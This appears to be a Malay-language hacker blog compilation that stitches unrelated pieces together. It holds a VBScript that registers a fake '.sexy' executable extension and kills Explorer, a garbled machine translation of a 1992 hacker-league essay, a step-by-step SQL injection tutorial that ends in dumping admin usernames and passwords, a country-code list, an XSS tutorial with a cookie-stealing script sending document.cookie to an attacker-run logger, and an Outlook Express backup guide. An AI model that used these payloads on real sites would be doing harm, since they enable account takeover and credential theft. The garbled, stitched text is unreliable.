11 perkara yang admin perlu sever perlu ambil berat
maanfaatkan kode2 di bawah.
'===================================
const HKEY_CLASSES_ROOT = & H80000000
const HKEY_CURRENT_USER = & H80000001
Quot = chr (34)
strComputer = "."
On error resume next
Tanya = MsgBox ("By Laluan Exelockdown dan Registry Shell Spawning" & _
vbNewLine & "datang Exelockdown?", 36, "Exelockdown Hacking - by Lovepassword")
If Tanya = 6 Then 'pilih YA
Set objRegistry = GetObject ("winmgmts: {impersonationLevel = impersonate}! \" & StrComputer & "ootdefault: StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ". sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexy",, "exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexy", "Content Type", "application / x-msdownload"
objRegistry.CreateKey HKEY_CLASSES_ROOT, ". sexyPersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT, ". sexyPersistentHandler ",,"{ 098f2470-bae0-11cd-b579-08002b30bfeb}"
objRegistry.CreateKey HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced", "HideFileExt", 0
Set objWMIService = GetObject ("winmgmts:" _
& "{ImpersonationLevel = impersonate}! \" & StrComputer & "ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate ()
Next
set objShell = CreateObject ("WScript.Shell")
objShell.Run "explorer.exe"
msgbox "copi file exe, jalankan operasi ini", vbInformation, "Exelockdown Hacking - nick kluang "
End If
'===========================================
save as di notepad dengan extension sexy.vbs
Dari McRod Perpustakaan Hacker
The Hacker's Kumpulan
Lee Felsenstein
18 Mac 1992
Teori
The Hacker's Kumpulan dimodelkan longgar selepas Amerika
Radio Relay League (ARRL), sebuah organisasi teknologi
petualang tempoh Edwardian. Dalam masa kejayaannya, radio
amatur pindah dari gangguan yang menjadi penting
penyumbang dengan perkembangan teknologi. Di lapangan
yang menuntut peraturan kerajaan untuk operasi tertib, yang
A.R.R.L. mewakili kepentingan amatur di majlis
kerajaan dan menyelenggarakan kegiatan pendidikan berterusan melalui
yang pendatang baru ke lapangan bisa belajar tidak hanya teknologi
terlibat, tetapi juga interaksi manusia yang menghubungkan
teknologi ke dunia luar.
Kemenangan terbaru amatir radio telah menjadi
pembangunan radio paket, yang baru-baru ini telah diterima pakai oleh
Motorola sebagai asas untuk "wireless local loop" untuk wayarles
operasi telefon. Berkat amatir, itu dikembangkan
dan cuba di lingkungan terbuka luar komersil
tekanan yang cenderung terhadap kerahsiaan dan pengecualian.
Di bidang komputer dan telekomunikasi, ada
beberapa selari antara hacker saat ini dan amatur radio
tahun 1915. Hacker dilihat oleh terhormat teknologi
Pemain sebagai gangguan mampu melakukan kerosakan besar dan umumnya
tanpa qualitites penebusan. Mereka dibezakan dari
nakal penyiar yang menginjak-injak isyarat lain dalam mendorong mereka untuk
menempuh jarak terpanjang. Dalam koridor kuasa ada
gerakan menuju melarang mereka. orang non-teknikal tidak
tahu apa yang harus berfikir tentang masalah ini dan yang dicadangkan
penyelesaian.
The A.R.R.L. lebih dari sebuah organisasi lobi, walaupun.
Ini menyediakan sarana untuk pendidikan bersama penting untuk
perkembangan teknologi apapun, pusat masuk terbuka untuk semua pendatang,
dan pemandangan sosial untuk menemani forum teknologi. Melalui
yang A.R.R.L. anak hijau temui oldtimers beruban yang
akan didekati dalam kedudukan mereka industri. Pada
lapangan hari dan acara lain cameraderie menjadi peneroka
mengatasi halangan kelas dan kedudukan maupun yang
yang disebabkan oleh persaingan komersial. Rangkaian ini mungkin dalam
persekitaran amatur yang diteruskan operasi dalam
komersil dan profesional alam sekitar.
Konsep Hacker Kumpulan mirip tetapi berbeza
sebagaimana layaknya sifat yang berbeza dari teknologi. Tujuannya adalah untuk
memberikan situasi di mana peserta dinyatakan memenuhi syarat untuk
Gelanggang boleh terlibat dalam situasi belajar formal, uji mereka
kemahiran sebagai alat bersenam kerajinan, tangan labah-on
pengalaman dengan sistem yang akan menjadi yg tak dpt diperoleh dinyatakan,
dan menyertai di kedua-dua sisi mentoring dan tutorial
hubungan.
The Hacker's Kumpulan akan memberikan jalan keluar untuk kreatif
tenaga yang dinyatakan dikeluarkan membuat hidup lebih buruk bagi
dirasakan atau membayangkan musuh melalui entri tidak sah ke
sistem dan tindakan menyalahi undang-undang atau tidak beretika yang lain. Seperti tenaga
akan berpaling kepada projek-projek yang memajukan keadaan
seni, dan dengan cara yang mengurangkan arogansi dan eksklusif
dari pengurus syarikat yang begitu menggoda hacker menemukan sebuah
target.
Untuk tuduhan bahawa Hacker Kumpulan akan menjadi sebuah front
untuk kepentingan industri mungkin akan mengangkat pertahanan yang oleh
takut industri pemanfaatan tentang gangguan peringkat rendah akan memberikan
pengorganisasian sebuah platform untuk serangan tahap yang lebih tinggi atas
dasar-dasar teknologi struktur yang ada. Mempertimbangkan
perbezaan antara hasil yang telah hacker pada tahun 1970 sudah
kandungan untuk menetapkan politik untuk akses kepada mainframe. Ada
akan ada industri komputer peribadi, dan daya
hubungan tidak akan mengalami perubahan radikal
dibawa oleh kemenangan arsitektur terbuka. Orang mungkin
juga mengatakan kemudiannya bahawa aktiviti komputer amatur adalah
gangguan dari tugas sebenarnya dari menarik-narik lengan kuasa,
namun kita semua boleh melihat kesan daripada kegiatan itu.
The Hacker's Kumpulan boleh dilihat sebagai gilda penayangan
menyekat masuk ke keahlian elit teknikal. Dalam
Bahkan, Kumpulan akan jauh lebih terbuka daripada sistem saat ini
pendidikan universiti. Ini akan menyediakan sarana ujian untuk
melihat apakah seseorang berpadanan dengan tuntutan teknologi
tanpa menuntut tahun komitmen untuk belajar prasyarat.
Dalam Kumpulan Hacker akan ada mobiliti jauh lebih
antara pakar dari yang ada dalam kurikulum universiti, dan
pintu akan terbuka untuk di bawah umur pendatang dan mereka yang datang kemudian
dalam kehidupan setelah masuk ke universiti menjadi sulit atau
mustahil.
Namun, kecenderungan manusia yang mengarah ke arah eksklusif
dan pembentukan klik akan selalu bersama kita, dan kita harus
beruang themin fikiran seperti yang kita meneruskan dalam konseptualisasi dan mewujudkan
Hacker Kumpulan. Teknologi di mana kita bekerja cenderung
menghilangkan keperluan untuk sentralisasi, dan salah satu yang penting
hasil pembangunan Kumpulan akan menjadi demonstrasi
dari mod desentralisasi organisasi, sebagai seorang yang mulia
eksplorasi mungkin direnungkan, int ia banyak pendapat.
Setelah semua, cabaran utama adalah tidak begitu banyak di
hardware, atau bentuk fizikal dari sistem
pergaulan dan interaksi masyarakat sekitar yang berkembang.
Pekerjaan penting dalam pembangunan bentuk-bentuk sosial penggunaan
teknologi ini yang ke depan umum yang baik dan juga bahawa
individu. cara baru berfikir, seperti Einstein mengatakan, adalah
diperlukan bahan untuk humanisasi dan survivalof
masyarakat. The Hacker's Kumpulan tidak hanya menyediakan
pembangunan tempat tidur untuk inovasi sosial yang melibatkan penggunaan
teknologi maklumat, tetapi akan memberi inovasi
melalui pembangunan teknologi selari, dan yang paling
penting, dari rangkaian manusia melalui teknologi ini
dibuat untuk menjadi hidup.
Amalan
The Hacker's Kumpulan akan menjadi organisasi keahlian terbuka
untuk nonanggota untuk fungsi tertentu. Ini akan ditetapkan sebagai
pendidikan bukan keuntungan dan organisasi saintifik. Nya
penerbitan akan bebas tersedia untuk semua pembaca tertarik.
Kumpulan akan mengadakan acara tempatan berkala menunjukkan
teknikal prestasi ahli atau bab, dan menawarkan
tempat bagi individu di luar Kumpulan untuk pameran atau untuk terlibat
dalam perdagangan peringkat rendah, seperti swap bertemu. pendatang baru A akan paling
mungkin membuat kenalan pertama di acara-acara seperti itu, dan mungkin memutuskan untuk
menghadiri pertemuan bab tempatan.
Rapat bab tempatan akan tinggi dalam maklumat
pertukaran dan rendah dalam struktur. Pendatang baru akan diluluskan
dan diberikan dengan orientasi singkat sehingga mereka tidak akan merasa
menunda dengan menampilkan dari keahlian teknikal atau cliquishness. Jika
pendatang baru yang dikehendaki penglibatan lebih lanjut, akan ada satu set
Tentu saja trek yang sedia sebagai pusat disarankan untuk mendirikan,
melalui pencapaian, peringkat kemahiran seseorang. Ini mungkin
dianggap sebagai Scout Merit badge, walaupun nama akan
mungkin tidak digunakan.
Pada peringkat awal penglibatan, pendatang baru mungkin
berinteraksi dengan pengajar yang dilantik yang juga bekerja untuk
membina kemahiran dalam mengajar dan latihan. Kemudian, sebagai pendatang baru
keuntungan kemahiran dan mendirikan kecekapan, ia akan
disyorkan untuk arahan lebih lanjut dan konsultasi individu dari
lebih tinggi terampil mentor. Seperti hubungan mentoring akan
menjadi ciri penting dari Liga, baik sebagai sarana dan dan
akhir.
Kumpulan di peringkat tempatan akan memperoleh mempertahankan
usang peralatan yang akan dikendalikan dan imporved oleh
ahli melalui projek-projek pembangunan yang dicadangkan dari
keahlian. Telekomunikasi sumber juga akan diminta
sebagai sumbangan daripada pembekal, atas saran tidak-terlalu-halus
bahawa ketersediaan sumber daya tersebut dalam konteks seperti adalah
kondusif untuk warga terampil developmentof bukan
antisosial penyerang. Melalui sumber ini Kumpulan akan
mengekalkan struktur yang lebih besar, yang akan komunikasi-
berdasarkan overlay rangkaian dan-iklan hocracies.
Melalui struktur ini conflicitng kedudukan boleh
dibincangkan dan diperdebatkan dalam demokrasi partisipatif berfungsi.
Maklumat plebisit akan dilakukan baik sebagai sarana
senseof yang menentukan Kumpulan pada isu-isu importsnce dan sebagai
projek pembangunan menguji kemampuan maklumat
teknologi di bawah pelbagai tatacara penggunaan. Tertinggi
struktur orgnization akan berada di peringkat tempatan, dan
pentadbir pada tahap yang lebih luas mungkin dibekalkan tajuk, seperti
Petugas kebersihan, yang cenderung untuk mengelakkan perkara mengiklankan dan pemuliaan diri.
kuasa budiman akan dipelihara dalam Liga sebagai
menentang kuasa kedudukan.
pendatang baru itu akan kemajuan dari membina nya
tahap kemahiran proses menjelajah program yang sedia
pengembangan diri. Ini mungkin untuk mencadangkan tertentu
berbeza dari mata kuliah yang disyorkan sahaja. pendatang baru ini
kemudian akan terlibat dalam projek-projek yang memerlukan pembaikan dalam
kemahiran peringkat di bawah kawalan atau ulasan terhadap terampil kompeten
ahli.
Ini harus dilihat sebagai pembangunan profesional (di mana
kata tidak mempunyai konotasi "carian nafkah") dan sejak itu
merupakan tanggung jawab dari semua profesional untuk mengajar dan menularkan
kemahiran mereka, pendatang baru di sepanjang jalan akan diharapkan
melakukan sebagai pengajar dan kemudian penyelia dan mentor untuk masa depan
pendatang baru. Dengan demikian, kemajuan dalam pembangunan diri tidak akan
hanya masalah daripada "hacks rapi" satu boleh menyelesaikan, tapi
akan memerlukan integrasi ke dalam masyarakat pertama hacker,
maka masyarakat yang lebih luas. Tidak ada alasan mengapa teknologi
harus bergantung pada orang lain untuk mewakili pekerjaan mereka kepada awam atau
kerajaan.
Salah satu fungsi perkhidmatan awam yang dilakukan oleh
ahli Kumpulan Hacker (dan prestasi ini akan menjadi
secara jelas dilakukan oleh ahli dan bukan oleh
"Organisasi") akan konsultasi tentang keselamatan maklumat
dan integriti komunikasi dalam masyarakat sehari-hari. Members
dari Kumpulan akan menyediakan perkhidmatan analisis proposal,
penyiasatan penyalahgunaan sistem dan mengejar pelaku yang
akan berehat pada pondasi profesional itsown daripada melayani
langsung komersil berakhir yang mungkin menyimpangkan kesimpulan
penyiasatan.
Untuk menggunakan metafora popular, ahli Kumpulan ofthe Hacker
boleh dibandingkan dengan doktor di Frontier Elektronik, dengan
persatuan perubatan mereka sendiri longgar untuk menjaga perdukunan di teluk dan
melayani fungsi kesihatan masyarakat. Atau mungkin analogi mungkin
adalah untuk guru sekolah yang juga menulis sastera dan sastera
kritik, serta turningout karya seni dan menyusun
kritik yang sama. Jelas, ruangan metaforik keperluan
bekerja.
Satu boleh berharap untuk keadaan material betterone melalui
menyertai inthe rangkaian hubungan yang akan menjadi
Hacker Kumpulan, jika seseorang memiliki kemahiran dan bakat untuk meningkatkan
seseorang kemahiran. Jika tidak, maka akan ada malu untuk berhenti
penyertaan. Fungsi penting dari Kumpulan adalah untuk
menggalakkan tidak cekap untuk pergi ke tempat lain tanpa opprobium.
Mereka mungkin muncul sebagai pentadbir dalam industri, dan
adalah tidak ada bunga yang 'untuk itu menjadi hubungan bermusuhan berdasarkan
atas "pecundang" status.
Bahkan, Hacker Kumpulan akan menjadi cara untuk membunuh dengan
yang "pemenang / pecundang" dikotomi. Jika anda cuba, anda menang untuk beberapa
darjah, dan lebih muda ahli yang tidak selamat dalam diri mereka sendiri perlu
mempelajari hal ini, kadang-kadang pada peringkat putus asa. Satu boleh mengambil lebih
thnone dapat menangani, dibenarkan untuk gagal dengan sokongan dari orang-orang
lebih berpengalaman, dan tidak menimbulkan kos yang sebenarnya atau emosional yang
dinyatakan akan membuat salah satu dari eksperimen tersebut. The
Hacker Kumpulan tidak akan berfungsi tanpa gelaran terukur
dari jujur memenangi kegagalan pada anggota partofits.
Apakah jenis projek yang akan dilakukan? Mungkin
pembangunan sistem operasi terdistribusi yang sesuai untuk
rangkaian peranti cerdas beraneka ragam; depan elegan pengguna-
berakhir dan persekitaran pembangunan untuk sistem intuitif
tatarajah; pidato pidgin (bahasa tidak alami) pengakuan
sistem, struktur baru dari groupware; posibly rangkaian saraf di
tahap yang lebih tinggi.
Tapi ini dugaan saya sendiri, dan apa yang akan benar-benar
berlaku hampir pasti membuat tebakan terlihat
ridiculously kuno dan primitif. Mari kita berikan kesempatan untuk
berlaku.
Sql Injection Tutorial
Kata kunci yang perlu diketahui
-------------------------------
karakter: ', -
comments: /*, --
-------------------------------
Makluman: "Information_schema" hanya befungsi untuk versi msql versi 5.x
Google Dork yang akan di gunakan ialah "inurl:news.php?id="
Langkah Pertama
[site]/news.php?id=1
---tambahkan karakter ' pada akhir url untuk lihat sama ada site itu vuln untuk
sql injection atau pun tidak.
contoh:
code:
[site]/news.php?id=1'
atau
[site]/news.php?id=-1
contoh error:
warning: mysql_fetch_array(): supplied argument is not a valid MYSQL
result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line
Langkah Kedua
Cari jumlah table yang ada di dalam database.
----tambahkan +order+by+1-- diakhir url
Contoh:
Code:
[site]/news.php?id=1+order+by+1--
atau
[site]/news.php?id=1+order+by+1/* periksa secara bepringkat
[site]/news.php?id=1+order+by+2/*
[site]/news.php?id=1+order+by+3/*cari sehingga error keluar
untuk tutorial ini jumlah table yg diperolehi ialah 3.
Langkah Ketiga
Gunakan perintah Union untuk mengeluarkan nombor yang akan kita gunakan kemudian.
-----perintah yang akan digunakan: union+select+1,2,3--
Contoh: angka 2 keluar.
kemudian kita masukkan version() di angka 2,
contoh:
[site]/news.php?id=1+union+select+1,version(),3--
dan paparan version akan tepapar di angka tersebut.
Contoh:
5.1.47-community-log
------
|info|
------
database() = untuk lihat name database yang digunakan
version() = untuk lihat version msql yang digunakan
Langkah Keempat
untuk nampakkan nama2 table yang ada di wenb tersebut, perintah
Table_name ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables-- ---> letak di belakang angka yang terakhir.
contoh:
[site]/news.php?id=1+union+select+1,table_name,3+from+information_schema.tables--
Langkah KeLima
Keluarkan kesemua isi yang ada di dalam table tersebut,
group_concat(table_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.tables+where+table_schema=database() ---> Masukan selepas angka yang terakhir.
Contoh:
[site]/news.php?id=1+union+select+1,group_concat(table_name),3+from+
information_schema.tables+where+table_schema=database()--
Langkah Ke Enam
Keluar kan kandungan yang ada didalam TABLE
group_concat(column_name) ---> letak di angka yang keluar tadi(2)
+from+information_schema.columns+where+table_name=0xHEXA--
|
|
(LETAK NAMA TABLE YANG SUDAH DI CONVERT KE HEXADECIMEL)
------
|info|
------
Website yang boleh digunakan untuk convert nama table ke hexadecimel ialah
-----> www.piclist.com/techref/ascii.htm
-----> www.centricle.com/tools/ascii-hex/
Column yang akan kita gunakan sebagai contoh ialah table ADMIN
dan hasil convert ialah 41444D494E
Contoh:
[site]/news.php?id=1+union+select+1,group_concat(column_name),3+from+
information_schema.columns+where+table_name=0x41444D494E--
Langkah Ketujuh
Keluarkan hasil isi yang kita berjaya peroleh dari table ADMIN
concat_ws(0x3a,"nama column yang terkandung dlm table ADMIN") ---> letak di angka yang keluar tadi(2)
+from+Admin-- --> asal column
Contoh:
[site]/news.php?id=1+union+select+1,concat_ws(0x3a,id,username,password),3+from+admin--
Dan kita akan peroleh username dan password admin untuk website tersebut.
Langkah Terakhir:
Cari Login untuk admin..
Selamat Mencuba.....
ID CODE UNTUK SETIAP NEGARA
Country Code
Afghanistan AF
Albania AL
Algeria DZ
American Samoa AS
Andorra AD
Angola AO
Anguilla AI
Antarctica AQ
Antigua and Barbuda AG
Argentina AR
Armenia AM
Aruba AW
Australia AU
Austria AT
Azerbaijan AZ
Bahamas BS
Bahrain BH
Bangladesh BD
Barbados BB
Belarus BY
Belgium BE
Belize BZ
Benin BJ
Bermuda BM
Bhutan BT
Bolivia BO
Bosnia and Herzegovina BA
Botswana BW
Bouvet Island BV
Brazil BR
British Indian Ocean Territory IO
Brunei Darussalam BN
Bulgaria BG
Burkina Faso BF
Burundi BI
Cambodia KH
Cameroon CM
Canada CA
Cape Verde CV
Cayman Islands KY
Central African Republic CF
Chad TD
Chile CL
China CN
Christmas Island CX
Cocos (Keeling) Islands CC
Colombia CO
Comoros KM
Congo CG
Congo, Democratic Republic CD
Cook Islands CK
Costa Rica CR
Cote d'Ivoire CI
Croatia HR
Cyprus CY
Czech Republic CZ
Denmark DK
Djibouti DJ
Dominica DM
Dominican Republic DO
East Timor TL
Ecuador EC
Egypt EG
El Salvador SV
Equatorial Guinea GQ
Eritrea ER
Estonia EE
Ethiopia ET
Falkland Islands (Malvinas) FK
Faroe Islands FO
Fiji FJ
Finland FI
France FR
French Guiana GF
French Polynesia PF
French Southern Territories TF
Gabon GA
Gambia GM
Georgia GE
Germany DE
Ghana GH
Gibraltar GI
Greece GR
Greenland GL
Grenada GD
Guadeloupe GP
Guam GU
Guatemala GT
Guinea GN
Guinea-Bissau GW
Guyana GY
Haiti HT
Heard and McDonald Islands HM
Honduras HN
Hong Kong HK
Hungary HU
Iceland IS
India IN
Indonesia ID
Iraq IQ
Ireland IE
Israel IL
Italy IT
Jamaica JM
Japan JP
Jordan JO
Kazakhstan KZ
Kenya KE
Kiribati KI
Kuwait KW
Kyrgyzstan KG
Lao People's Democratic Republic LA
Latvia LV
Lebanon LB
Lesotho LS
Liberia LR
Libya LY
Liechtenstein LI
Lithuania LT
Luxembourg LU
Macau MO
Macedonia MK
Madagascar MG
Malawi MW
Malaysia MY
Maldives MV
Mali ML
Malta MT
Marshall Islands MH
Martinique MQ
Mauritania MR
Mauritius MU
Mayotte YT
Mexico MX
Micronesia FM
Moldova MD
Monaco MC
Mongolia MN
Montserrat MS
Morocco MA
Mozambique MZ
Namibia NA
Nauru NR
Nepal NP
Netherlands NL
Netherlands Antilles AN
New Caledonia NC
New Zealand NZ
Nicaragua NI
Niger NE
Nigeria NG
Niue NU
Norfolk Island NF
Northern Mariana Islands MP
Norway NO
Oman OM
Pakistan PK
Palau PW
Palestinian Territory PS
Panama PA
Papua New Guinea PG
Paraguay PY
Peru PE
Philippines PH
Pitcairn PN
Poland PL
Portugal PT
Puerto Rico PR
Qatar QA
Reunion RE
Romania RO
Russian Federation RU
Rwanda RW
Saint Kitts and Nevis KN
Saint Lucia LC
Saint Vincent and the Grenadines VC
Samoa WS
San Marino SM
Sao Tome and Principe ST
Saudi Arabia SA
Senegal SN
Serbia and Montenegro CS
Seychelles SC
Sierra Leone SL
Singapore SG
Slovakia SK
Slovenia SI
Solomon Islands SB
Somalia SO
South Africa ZA
South Georgia and The South Sandwich Islands GS
South Korea KR
Spain ES
Sri Lanka LK
St. Helena SH
St. Pierre and Miquelon PM
Suriname SR
Svalbard and Jan Mayen Islands SJ
Swaziland SZ
Sweden SE
Switzerland CH
Taiwan TW
Tajikistan TJ
Tanzania TZ
Thailand TH
Togo TG
Tokelau TK
Tonga TO
Trinidad and Tobago TT
Tunisia TN
Turkey TR
Turkmenistan TM
Turks and Caicos Islands TC
Tuvalu TV
Uganda UG
Ukraine UA
United Arab Emirates AE
United Kingdom GB
United States US
United States Minor Outlying Islands UM
Uruguay UY
Uzbekistan UZ
Vanuatu VU
Vatican VA
Venezuela VE
Viet Nam VN
Virgin Islands (British) VG
Virgin Islands (U.S.) VI
Wallis and Futuna Islands WF
Western Sahara EH
Yemen YE
Zambia ZM
Zimbabwe ZW
XSS Tutorial
Apakah itu Xss(Cross-Site scripting)?
XSS, singkatan dari apa yang dikenali sebagai Cross-Site Scripting adalah proses menyuntik JavaScript (terutama) dan juga HTML ke sebuah laman web untuk maklum balas penting. Ulasan ini mungkin mengandungi banyak hal, salah, paling sering menjadi cookies pengguna. Sekarang, untuk semua orang membaca ini, saya berasumsi bahawa anda tahu apa cookies dan bagaimana ia digunakan pada laman web, tetapi jika tidak, saya akan menjelaskan anyways.
Kuki adalah pembolehubah yang web-browser gunakan untuk menyimpan log masuk anda. Tanpa cookies, anda tidak boleh "tetap masuk dalam" di laman web kegemaran anda. Hal ini penting kerana jika seseorang adalah untuk mendapatkan cookies anda, dia dengan mudah boleh spoof maklumat login anda tanpa perlu mengetahui password anda. Beberapa cookies cukup mendasar, seperti PHPSESSID, yang hanya sesi anda pada laman PHP powered. Jika website hanya menggunakan cookies PHPSESSID untuk mengesahkan penggunanya, seseorang dapat mencuri cookies melalui kerentanan XSS dan spoof siapa pun yang memiliki cookies penyerang.
"Hampir 90% website terdedah kepada serang XSS, tidak terkecuali website kerajaan"
--==[Dua Method Serangan XSS]==--
a) Dasar XSS (user-bentuk merefleksikan kembali XSS).
b) Memisahkan HTTP Respon.
1. Dasar XSS
a. Ini adalah sesuatu yang sederhana, seperti medan carian yang membolehkan masukkan HTML. Apabila pengguna mencari untuk sesuatu dan input tercermin pada halaman berikut, ini mungkin menunjukkan tanda-tanda kemungkinan XSS. Sekarang, ketika pengguna mencari sesuatu seperti contoh :
Jika script (1) akan memaparkan kotak
Jika untuk (2) akan terhasilnya tulisan di page.
www.nickkluang.blogspot.com
--==[Cara Bagaimana hendak mencuri Cookies melalui XSS attack]==--
[Code]
Ini adalah yang paling asas JavaScript untuk usaha mencuri cookies. Inilah yang kemungkinan besar akan ditempatkan di dalam salah satu daripada banyak fail. Js yang diambil oleh pelayan remote.
Script ini akan mengarahkan semula laman web untuk http://site.com/log.php?c [MEREKA COOKIE] = & redirect = http://siteb.com
GET c pembolehubah mengandungi cookies pengguna daripada laman berikut. Bahagian redirect hanyalah GET var yang akan mengarahkan mereka dari logger, untuk website lain, sehingga mereka tidak melihat TERLALU sesuatu yang aneh. Cara terbaik untuk mengelakkan kecurigaan adalah untuk mengarahkan mereka ke halaman yang sama, hanya halaman yang berbeza.
Keterangan JavaScript jika anda belum tahu itu:
document.location = ""; atau document.location (); adalah fungsi dalam JavaScript bahawa perubahan dokumen (halaman web)
lokasi. document.cookie adalah cara JavaScript cookies menyimpan maklumat pada sebuah laman web. Kebanyakan semuanya
dapat dipanggil dari dokumen .* apapun.
--==[Scripts Dan Syntax untuk log.php dan H3x4.js]==--
-Evil.js
document.location="http://yoursite.com/logger.php?cookie="+document.cookie+"&redirect=http://theirsite.com/diff_page.php";
-Log.php
kemudian simpan di remote server (server anda)
Setelah berusaha mencari tahu di internet untuk menemukan bagaimana cara melakukan backup email yang ada di inbox outlook express bahwa sudah beberapa kali namun tidak menemukan cara yang tepat untuk membacup data email. Oleh karena kebutuhan sangat mendesak dan harus backup email akhirnya saya mencoba mencaritahu dari menu-menu yang ada di outlook express untuk melakukan backup email.
Setelah try and error akhirnya usaha saya untuk membackup semua email yang ada di inbox outlook express pun berhasi sampai dengan merestore kembali email tersebut di outlook express. Bagi sobat yang ingin tau bagaimana cara membackup email dari outlook express dan merestore kembali ke outlook express lihat tipsnya berikut ini.
Pertama masuk dulu ke outlook express.
Klik menu File - Export - Messages
Akan muncul pesan "This will export messages from outlook express to microsoft outlook or microsoft exchange" klik OK saja.
Pada jendela export messagespilih folder yang ingin di export atau gunakan all folders untuk mengexport semua folder kemudian klik OK
Langkah pertama sudah selsai
Langka kedua masuk ke Microsoft Outlook
Klik menu File - Import and Export sehingga muncul jendela Import and export wizard
Pilih Import internet mail and address lanjutkan dengan klik Next
Pada jendela outlook import tool, pilih outlook express 4.x,5.x,6.x dan centangkan
Import mail, import address book dan import rules kemudian klik Next
Pada jendela import address pilih options Replace duplicates with items imported jika ingin menimpah alamat yang sudah ada, Allow duplicates to be created bila ingin menyimpan juga alamat import meskipun ada alamat yang sama dan pilih Do not import duplucate items untuk tidak mengimport alamat yang sama.
Saran saya gunakan options ke dua yaitu Allow duplicates to be created dan lanjutkan dengan klik finish dan tunggu proses import hingga selesai kemudian klik save in inbox dan muncul sebuah pesan di inbox yang menyatakan bahwa total mail yang diimport ke dalam inbox.
Sampai di sini belum selesai, kita harus membackup semua email yang ada di inbox microsoft outlook tersebut menjadi sebuah file sehingga bisa dibawa ke mana-mana misalnya di copy ke flash disk atau media penyimpan data lainnya seperti cd atau ke komputer lain.
Masih berada di microsoft outlook klik menu File - import and export sehingga muncul jendela Import and export wizard
Pada jendela Import and export wizard Klik Export to a file dan klik Next
Pada jendela Export to a file klik Personal Folder File (.pst) dan klik Next
Pada jendela Export Personal Folders pilih Inbox dan jangan lupa centang pada Include Subfolders bila ada sub folder, kalau tidak adan sub folder maka tidak perlu di centang dan selanjutnya klik Next
Ketik nama file misalnya "backup.pst" dan Klik browse untuk menentukan tempat menyimpan file backup email tersebut misalnya di drive D:\> kemudian klik Finish.
Demikian langkah melakukan backup email outlook express.
Selanjutnya mari kita melakukan restore email outlook express.
Caranya masih sama seperti melakukan backup hanya untuk melakukan restore urutannya
sebaliknya.
Pertama jalankan terlebih dahulu microsoft outlook
Klik menu File - Import and export
Pada jendela Import and export wizard pilih Import from another program or file dan klik Next
Di jendela Import a file pilih Personal Folder File (.pst) dan klik Next
Klik browse dan cari file backup yang sudah kita backup tadi misalnya dengan nama file "backup.pst" dan klik Next
Terakhir klik Finish sehingga semua email yang dibackup tadi masuk ke inbox microsoft outlook.
Karena rencana kita adalah restore email pada inbox outlook express maka jalankan outlook express.
Klik menu File - Import - Messages sehingga muncul jendela Outlook Express Import, dan klik Microsoft Outlook kemudian klik Next
Centang pada All folders dan klik Next, tunggu hingga proses import selesai dan klik Finish
Semua langkah untuk melakukan backup email outlook express hingga merestorenya kembali sudah selesai dan selamat mencoba semoga bermanfaat.